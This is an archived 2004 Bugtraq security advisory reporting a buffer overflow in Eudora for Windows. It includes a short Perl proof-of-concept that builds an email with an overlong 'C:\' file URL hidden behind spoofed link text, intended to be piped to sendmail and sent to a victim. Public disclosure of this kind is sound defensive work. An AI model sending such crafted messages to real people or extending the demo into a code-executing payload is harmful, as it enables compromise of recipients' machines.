Eudora file URL buffer overflow

To: NTBugtraq@xxxxxxxxxxxxxxxxxxxxxx, beckley@xxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx
Subject: Eudora file URL buffer overflow
From: psz@xxxxxxxxxxxxxxxxx (Paul Szabo)
Date: Fri, 7 May 2004 12:10:59 +1000 (EST)
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

There is a buffer overflow in Eudora for Windows, verified on versions
6.1, 6.0.3 and 5.2.1. This is easily exploitable to run arbitrary code.
I do not know if this issue affects Eudora for Macs.

Demo:

#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "The following is a \"proper\" HTML URL, pointing to somewhere long:\n";
print "<x-html>\n";
print "<a href=\"C:\\", "A"x300, "\">\n";
print "Fake URL to http://anywhere/I/want</a>\n";
print "</x-html>\n";
print "Clicking above will crash Eudora.\n\n";
print "The following plain-text converted by Eudora into a clickable URL\n";
print "http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\n";;
print "is for comparison: the user can hardly tell them apart.\n\n";

Cheers,

Paul Szabo - psz@xxxxxxxxxxxxxxxxx  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia

Follow-Ups:
- Status bar exploit hides spoofed URLs Eudora, possibly other e-mail clients
  - From: Brett Glass

Prev by Date: Re: Titan FTP Server Aborted LIST DoS
Next by Date: Streaming Video and Audio
Previous by thread: Fwd: [Re: cvs commit: src/sys/vm vm_map.c]
Next by thread: Status bar exploit hides spoofed URLs Eudora, possibly other e-mail clients
Index(es):
- Date
- Thread